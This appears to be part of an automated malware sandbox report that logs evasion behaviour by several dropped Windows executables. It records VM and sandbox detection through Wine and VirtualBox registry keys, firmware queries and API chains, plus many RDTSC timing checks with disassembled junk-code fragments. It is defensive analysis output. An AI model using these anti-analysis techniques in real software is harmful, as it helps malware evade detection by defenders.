Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Found API chain indicative of sandbox detection
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Evasive API call chain: GetPEB, DecisionNodes, Sleep
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe System information queried: FirmwareTableInformation Jump to behavior
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4F8C1 second address: A4F8C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4F8C6 second address: A4F8CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB8A44 second address: BB8A6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 jmp 00007F0F34BEC159h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC96DF second address: BC9701 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F0F345319E6h 0x0000000a pop ebx 0x0000000b pop esi 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0F345319F1h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC9701 second address: BC9705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC997B second address: BC9981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC9981 second address: BC9985 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC9985 second address: BC99A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F345319EDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d jne 00007F0F345319F9h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC9AE3 second address: BC9AE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC9AE9 second address: BC9AEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC9D54 second address: BC9D5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC9D5F second address: BC9D65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC9D65 second address: BC9D69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC9E95 second address: BC9ED8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F345319F9h 0x00000009 popad 0x0000000a pushad 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f jng 00007F0F345319EAh 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F0F345319F4h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC9ED8 second address: BC9EF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC159h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCCF8D second address: BCCF92 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCCF92 second address: BCCFAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007F0F34BEC14Bh 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCCFAF second address: BCCFBC instructions: 0x00000000 rdtsc 0x00000002 je 00007F0F345319E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCCFF7 second address: BCCFFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCD174 second address: BCD198 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0F345319EBh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCD198 second address: BCD209 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 add dword ptr [esp], 6603B300h 0x0000000e mov edx, dword ptr [ebp+122D1CE1h] 0x00000014 jmp 00007F0F34BEC14Fh 0x00000019 push 00000003h 0x0000001b mov ecx, dword ptr [ebp+122D3DDCh] 0x00000021 push 00000000h 0x00000023 and edx, 72EB46EEh 0x00000029 push 00000003h 0x0000002b jmp 00007F0F34BEC157h 0x00000030 push 6887205Fh 0x00000035 js 00007F0F34BEC16Eh 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F0F34BEC158h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCD209 second address: BCD27C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319EAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 5778DFA1h 0x00000010 push ebx 0x00000011 mov ecx, dword ptr [ebp+122D3E44h] 0x00000017 pop edi 0x00000018 push eax 0x00000019 mov edx, dword ptr [ebp+122D3DACh] 0x0000001f pop ecx 0x00000020 lea ebx, dword ptr [ebp+12451E5Fh] 0x00000026 jmp 00007F0F345319F2h 0x0000002b mov esi, dword ptr [ebp+122D39CCh] 0x00000031 xchg eax, ebx 0x00000032 jmp 00007F0F345319F9h 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b js 00007F0F345319E6h 0x00000041 jmp 00007F0F345319EBh 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCD27C second address: BCD286 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0F34BEC14Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCD35F second address: BCD3BC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007F0F345319E8h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 sub dword ptr [ebp+122D1CDCh], ecx 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push ebx 0x0000002d call 00007F0F345319E8h 0x00000032 pop ebx 0x00000033 mov dword ptr [esp+04h], ebx 0x00000037 add dword ptr [esp+04h], 00000017h 0x0000003f inc ebx 0x00000040 push ebx 0x00000041 ret 0x00000042 pop ebx 0x00000043 ret 0x00000044 xor dword ptr [ebp+122D263Dh], eax 0x0000004a push 5D5FCE2Fh 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCD3BC second address: BCD3C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCD3C0 second address: BCD3C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BED3D3 second address: BED419 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC154h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F0F34BEC157h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007F0F34BEC148h 0x00000017 js 00007F0F34BEC14Ch 0x0000001d je 00007F0F34BEC146h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEB304 second address: BEB32C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F345319EFh 0x00000009 popad 0x0000000a push ecx 0x0000000b jmp 00007F0F345319ECh 0x00000010 jbe 00007F0F345319E6h 0x00000016 pop ecx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEB479 second address: BEB47E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEB47E second address: BEB48C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0F345319E8h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEBD51 second address: BEBD6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F0F34BEC146h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0F34BEC151h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEBD6F second address: BEBD75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEBD75 second address: BEBD7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEBD7B second address: BEBD80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEBD80 second address: BEBD86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEBD86 second address: BEBD99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0F345319EAh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEC193 second address: BEC19D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB5457 second address: BB5467 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0F345319EAh 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BECA41 second address: BECA47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BECA47 second address: BECA60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F345319F5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BECA60 second address: BECA64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BECA64 second address: BECA78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BECA78 second address: BECA7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BECA7C second address: BECA84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BECA84 second address: BECAA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC154h 0x00000007 pushad 0x00000008 jmp 00007F0F34BEC14Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BECAA8 second address: BECAAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BECC1B second address: BECC2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0F34BEC14Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BECF68 second address: BECF6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BECF6C second address: BECF73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BED24C second address: BED250 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BED250 second address: BED258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BED258 second address: BED281 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F0F345319EEh 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0F345319F1h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEE87F second address: BEE885 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEE885 second address: BEE889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEE889 second address: BEE88D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEE88D second address: BEE8A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F0F345319E8h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF175E second address: BF1762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF1762 second address: BF1766 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF811A second address: BF8124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0F34BEC146h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF8124 second address: BF812A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF812A second address: BF8130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF8130 second address: BF8137 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF7842 second address: BF7857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F34BEC150h 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF79CA second address: BF79D4 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0F345319E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF7CAA second address: BF7CCB instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0F34BEC163h 0x00000008 jmp 00007F0F34BEC157h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF7F99 second address: BF7FB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F345319F6h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFABC6 second address: BFABD1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F0F34BEC146h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFABD1 second address: BFABE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jbe 00007F0F345319ECh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFB0B2 second address: BFB0B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFB19C second address: BFB1A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F0F345319E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFB671 second address: BFB676 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFC07C second address: BFC080 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFC080 second address: BFC0A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov esi, dword ptr [ebp+122D3F5Ch] 0x00000010 push 00000000h 0x00000012 xor si, E10Bh 0x00000017 push 00000000h 0x00000019 adc di, 30A6h 0x0000001e xchg eax, ebx 0x0000001f push eax 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFD9EA second address: BFDA6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319F6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F0F345319E8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 sub dword ptr [ebp+122D1D02h], edx 0x0000002d push 00000000h 0x0000002f cmc 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push eax 0x00000035 call 00007F0F345319E8h 0x0000003a pop eax 0x0000003b mov dword ptr [esp+04h], eax 0x0000003f add dword ptr [esp+04h], 00000014h 0x00000047 inc eax 0x00000048 push eax 0x00000049 ret 0x0000004a pop eax 0x0000004b ret 0x0000004c mov esi, dword ptr [ebp+122DBC8Bh] 0x00000052 xchg eax, ebx 0x00000053 push eax 0x00000054 push edx 0x00000055 push edx 0x00000056 jmp 00007F0F345319F2h 0x0000005b pop edx 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFD1E9 second address: BFD1EF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
